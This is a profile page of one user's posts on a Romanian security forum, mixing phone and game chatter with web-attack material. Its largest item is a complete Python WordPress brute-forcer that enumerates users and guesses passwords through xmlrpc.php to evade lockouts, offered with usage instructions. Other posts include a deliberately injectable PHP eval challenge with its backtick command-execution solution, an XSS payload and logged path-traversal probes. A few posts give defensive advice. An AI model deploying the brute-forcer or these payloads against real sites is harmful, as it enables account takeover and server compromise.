-
Posts
981 -
Joined
-
Last visited
-
Days Won
20
Everything posted by dancezar
-
Simplu nu poti:) Pentru ca injectia este dupa where, cea ce vrei tu se poate realiza daca injectia este intre SET si WHERE , ce poti sa faci este sa extragi date .
-
New Zealand just made online trolling illegal
dancezar replied to Silviu's topic in Stiri securitate
Ma intreb daca fac misto pe net de unu din Noua Zeelanda si eu sunt in Romania ce se intampla? @Aerosol tata acolo in Noua Zeelanda o sa fii cu sufletul impacat, cu toti trolleri astia din Romania o sa faci infarct de suparare:)) -
mt_rand(); in loc de rand. Am vazut undeva un tip care a generat o poza cu pixeli numere random , si se observa un flux care ar putea prezice ce numar ar fi peste un anumit numar de executii . Dar in real-case e destul de complicat de ghicit pentru ca intervin mai multi factori pid-u de exemplu care il poti afla decat din interior si ce rost mai are sa il afli daca esti in interior:)). Pe php.net spune ca functiile rand si mt_rand is functii care nu ofera siguranta criptografica si ca referinta ne da PHP: openssl_random_pseudo_bytes - Manual care cica ar fi sigur criptografic...
-
ROM(315 MB): Mod Edit: Removed L-au sters , chiar si asa am incercat sa instalez destule romuri .zip si nu au mers tot in CW recovery mode ramane nu booteaza roomu.Si ala cica oficial 2.3.6 l-am instalat tot asa ramane .
-
Am primit un samsung galaxy ace plus de la un unchi care l-a stricat. Problema e ca a incercat nu stiu ce sa faca sa dea resetare cu setari din fabrica si s-a sters romu avea cyanogen mode. Acuma cand deschid telefonu ramane blocat in CW mode.Am incercat sa iau de pe xda niste romuri pentru acest telefon l-am instalat de pe card cu CW ,instalarea e cu success , dar cand dau restart la telefon ramante tot in CW. Stie cineva ce pot face in cazul asta?
-
Pentru ca il tii pe un server de hostat cartofi e de la versiunea de PHP sau ceva , practic unde vezi " pui ' in fisieru api si se rezolva pe un server normal nu s-ar intampla asta:))
-
Am si eu un S4 mini , iar culorile se vad excelent pe s4 mini , m-am uitat si pe un s3 dar scuze culorile se vad mai ampulea pe s3, oricum au acelasi ecran amoled.Acum depinde de tine ce fel de telefon vrei unu mai mare sau unu mai micut ,oricum intradevar s4 e mai finut si elegant. Din cate stiu am facut un benchmark pe antutu , iar s4 mini surprinzator era peste s3 , acuma nu stiu ce sa zic de LTE din cate am vazut are 2gb ram si s-ar putea sa pice aici , este cpu quad dar conteaza si chipsetu. La inceput am vrut sa imi iau un LTE in loc de s4 mini dar nu am gasit pe stoc pe nicaieri. Eu zic sa iei un s3 lte daca ai un ban in plus, sau mai astepti putin si iei un S4 normal un telefon excelent , desi e mai mare ca s3 e mai fin si frumos decat s3.
-
@theeternalwanderer gandeste-te la acel caracter in mysql care permite transformarea oricarui keyword chiar si cele rezervate intr-un nume de coloana. Indiciu: select key from tabel => erroare de sintaxa cum rezolvi?
-
Plm calculator inseamna macar sa poata face toate operatiile de baza + ,* ,- ,/ . Ce sa mai zic de evaluarea unei expresii matematice cu paranteze si cu ordinea efectuarii operatiilor. <?php class calculator{ private $cifre=array(0=>"zero",1=>"unu",2=>"doi" - Pastebin.com Ms @proof nu mai folosi nicodata PHP_SELF nesintetizat baga scrip.php/"><script>alert(1)</script>
-
Sa zicem ... Desi pe chrome nu are cum sa mearga
-
))))))) nu ma asteptam ca tu sa fi fost, bravo boss, interesanta rezolvarea ta ai pm cu cea pe care am gandito eu . Apropo uitati ceva interesant din loguri: *.*.*.* - - [12/Nov/2014:01:34:40 +0100] "GET /challenges/xss_chall.php/acunetix-wvs-test-for-some-inexistent-file HTTP/1.0" 200 6310 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36" sau de la acelasi persoana: *.*.*.*- - [12/Nov/2014:01:34:55 +0100] "GET /challenges/xss_chall.php/?page=../../../../../../../../../etc/passwd%00.jpg HTTP/1.0" 200 6203 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36" *.*.*.* - - [12/Nov/2014:01:35:12 +0100] "GET /challenges/xss_chall.php//.../.../.../.../.../.../.../.../windows/win.ini HTTP/1.0" 200 6203 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36"
-
*.*.*.* - - [10/Nov/2014:19:13:09 +0100] "GET HTTP/1.0" 304 198 "http://www.pwnthecode.org/challenges/xss_chall.php/ce-ai-facut-mai-dany-aici-))" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36" )) bine Baieti ... e un string codat in base64 zau , toti numai dupa stringul in base64 anaintea lui ,in interiorul lui , dar de decodat si codat la loc ati incercat? Este doom apropo...
-
URL: http://www.pwnthecode.org/challenges/xss_chall.php/Y2FjYXQ= Level: ? Cerinte: 1) Folositi numai google chrome (cu altceva nu merge rezolvat) 2) Scoateti o alerta ( nu confirm nu promt) cu document.cookie Hint: Ca sa nu va bateti capu aiurea , nu are legatura cu sursa obuscata Solvers: -BitMap -dcristi -dekeeu -
-
Challenge closed. Felicitari celor care au reusit sa il rezolve @mah_one. Deci dupa cum arata lista aia nu avem voie sa folosim functii si nici sa executam alte instrutiuni . Instructiunea care se evalueaza in acel cod PHP este: $var='Numele tau:'.$atrib; In primul rand trebuie sa iesim din argument ca sa putem executa alta intructiune deci injectia noastra pana acuma arata asa: '.Instructiune.' In hintul 1 am spus ca am uitat sa pun un caracter in acea lista care poate executa comenzi. In hintul 2 am spus ca daca avem un tabel cu coloanele table si id , si executam urmatorul query: select table from photo.Vom obtine o eroare pentru ca , coloana table este un cuvant rezervat in Mysql , ca sa putem sa selectam coloana table fara ca sa apara eroarea o cuprindem intre `table` Hintul 3 spune ca hintul 2 are legatura cu hintul unu . Deci `table` si un caracter ca lispeste din lista aia . Si iata UBER injectia: '.`ls`.' `` este prescurtarea de la folosirea functiei shell_exec. Puteti incerca : echo `ls`;
-
GJ BitMap . Mai las challenge-ul pana diseara nu utiati de hinturi.
-
Hint 1: -Am uitat sa elimin 1 caracter din acea lista care poate executa comenzi. Hint 2: -Sa presupunem ca avem un tabel cu numele photo care are doua coloane id,table. Daca vom incerca sa executam un query: select table from photo . Vom obtine o eroare cel putin la mysql .Cum reparam aceasta erroare? Hint 3: Hintul 2 are legatura cu hintul 1
-
In concluzie poti folosi PDO cu prepare mai putin eficient adevarat cum zicea behave sau cu query() folosind functia escape_string()/quote() pt a escapa stringuri , sau operatorul de conversie (int) pt numere. De accea iti zic ca ai 2 cazuri si trebuie sa stii ce input trebuie sa folosesti , ori cuprinzi toate inputurile intre ghilimici peste tot chiar daca inputul trebuie sa fie un numar caz in care vei folosi peste tot in query-uri escape_string()/quote(), sau sa ai invedere daca trebuie sa folosesti in query un numar sa il convertesti in (int) sau daca e string sa folosesti escape_string()/quote()
-
<?php $b=array("(",")","=","[","]","$","%","|","&","{","}","+","-","<",">",chr(47),chr(92),";","*"); $atrib=str_replace($b," ",urldecode($_REQUEST['a'])); $atrib="'".$atrib."'"; eval(" $"."var='Numele tau:'.".$atrib."; "); echo $var; ?> Aveti un cod vulnerabil , trebuie sa injectati in parametrul a= challenge.php?a=Dan astefel in cat sa se execute comanda LS sau DIR (daca sunteti pe windows). Postati un print si trimiteti solutia prin PM.Clasamentul se v-a realiza la final in functie de cea mai scurta solutie(numarul de caractere). Challenge-ul v-a dura pana maine:) Proof: http://s27.postimg.org/n5zbnbqer/rce.jpg Solvers: 1 . Bitmap 2 . mah_one Daca nu reuseste nimeni diseara veti primi primul pont:)
-
Cum adica "pica" tu ai o aplicatie care face select dintr-un tabel dupa un ID numeric, deci clar utilizatorul trebuie sa iti dea o valoare numerica ,daca nu ti-o da numerica o faci tu ca sa fie numerica. $var="123a"; echo (int)$var;// 123 Aici chiar daca iti da un numar sau nu ti-l converteste in INT @Dragos uitate la functie sqli_escape($text,0) pentru numere in cazul tau , iara sqli_escape($text,1) pentru stringuri Oricum pt lucruri simple PDO este deajuns
-
Cand PDO este folosit corect cu prepared query , este deajuns , dar daca nu il folosesti corect cam asa se intampla : https://rstforums.com/forum/90935-drupal-7-31-pre-auth-sql-injection-vulnerability.rst ... Totusi din start tu trebuie sa ai in vedere ce tip de date iti da utilizatorul ca input poti face o functie de genu pt a escapa numere si stringuri: <?php function sqli_escape($var,$type){ if($type==0) return (int)$var; else return mysql_real_escape_string($var); } echo "Numarul 123a escapat este:".sqli_escape("123a",0)."<br>";//Pentru numere echo "Un test: ".sqli_escape("'test'",1);// Pentru stringuri. ?>
-
hmmm interesant am sa il fac maine sa mearga si asa... L-a incercat cineva asa cu un single target?
-
Inteleg ca maxim 600 de requesturi POST pentru xmlrpc , e cam deajuns ca sa faci un bruteforce rapid , singura metoda sigura sa eviti asta e: <?php add_filter( 'xmlrpc_methods', 'Remove_Unneeded_XMLRPC' ); function Remove_Unneeded_XMLRPC( $methods ) { unset( $methods['wp.getUsersBlogs'] ); return $methods; } ?>
-
import urllib2 import Queue import threading,sys useri=[] passwd=[] url="" work=0 stiva=Queue.Queue() stiva_us=Queue.Queue() def login(domain,user,passs): xml_post="<methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value><string>"+str(user)+"</string></value></param><param><value><string>"+str(passs)+"</string></value></param></params></methodCall>" re=urllib2.Request(domain,xml_post) try: ur=urllib2.urlopen(re) html=ur.read() if "Incorrect username" in html: return 0 elif "isAdmin" in html: return 1 elif "requested method " in html: print "[+] Modulul wp.getUsersBlogs e blocat!" exit() else: print "[!] unknow response" exit() except urllib2.URLError,e: print "[!] Erroare HTTP "+e.code() exit() def enum(j): global work,stiva,url,useri while work==1: try: i=stiva.get(False) try: r=urllib2.Request(url+"?author="+str(i)) u=urllib2.urlopen(r) redirect=u.geturl() if "/author/" in redirect: splited=redirect.split("/author/") us=splited[1].replace("/","") if us not in useri: useri.append(us) print us except urllib2.URLError,e: a=1 if stiva.empty(): return 0 except Queue.Empty: pass else: stiva.task_done() def brute(j): global bad,stiva_us,url,work while work==1: try: creds=stiva_us.get(False) rez=login(url,creds[0],creds[1]) print str(creds[0])+" "+str(creds[1]) if rez==1: print "[+] Got him ^~^ :"+str(creds[0])+" "+str(creds[1]) work=0 except Queue.Empty: pass else: stiva_us.task_done() url=sys.argv[1] passwd=open(sys.argv[3]).read().splitlines() th=[] th_br=[] work=1 for i in range(4): t=threading.Thread(target=enum,args=(1,)) th.append(t) t.start() for i in range(12): stiva.put(i) for i in th: i.join() if len(useri)>0: print "[+] Am terminat de enumerat useri:"+str(len(useri)) print "[+] Incep bruteforce" else: print "[-] Nu s-au gasit useri voi incerca cu lista de useri" users=open(sys.argv[2]).read().splitlines() for user in users: useri.append(user) print "[+] Incep bruteforce" print "[+] Testez daca exista xmlrpc.php" r=urllib2.Request(url+"/xmlrpc.php") try: ur=urllib2.urlopen(r) except urllib2.URLError,e: print "[!] "+e.code()+" xmlrpc nu exista!" exit() work=1 url+="/xmlrpc.php" for us in useri: for p in passwd: stiva_us.put((us,p)) for t in range(int(sys.argv[4])): thr=threading.Thread(target=brute,args=(1,)) th_br.append(thr) thr.start() for t_j in th_br: t_j.join() print "[+] EXIT!" import urllib2 import Queue import threading,sys useri=[] passwd=[] url=" - Pastebin.com Aveam nevoie de un bruteforcer pt wordpress care sa treaca de protectii precum capcha sau restrictie prin incercari repetate,mi-am amintit de un articol unde prezenta acest concent si m-am apucat sa fac un bruteforcer in python (nu sunt foarte talentat la python m-am apucat doar de 3 luni).Mai intai v-a incerca sa enumere useri ( aici mai trebuie lucrat nu scoate din titlu ci doar din redirect) , iar apoi v-a face bruteforce. python wp_brute.py site.com userlist.txt passlist.txt NR_THREADS Userlist.txt este necesar atunci cand nu a reusit sa enumere useri. Eu l-am incercat pe 2 site-uri la care am stiut deja parola si pe localhost si a mers.
-
E si PAYDAY 2 free tot asa 2 zile:D E mai fain PAYDAY2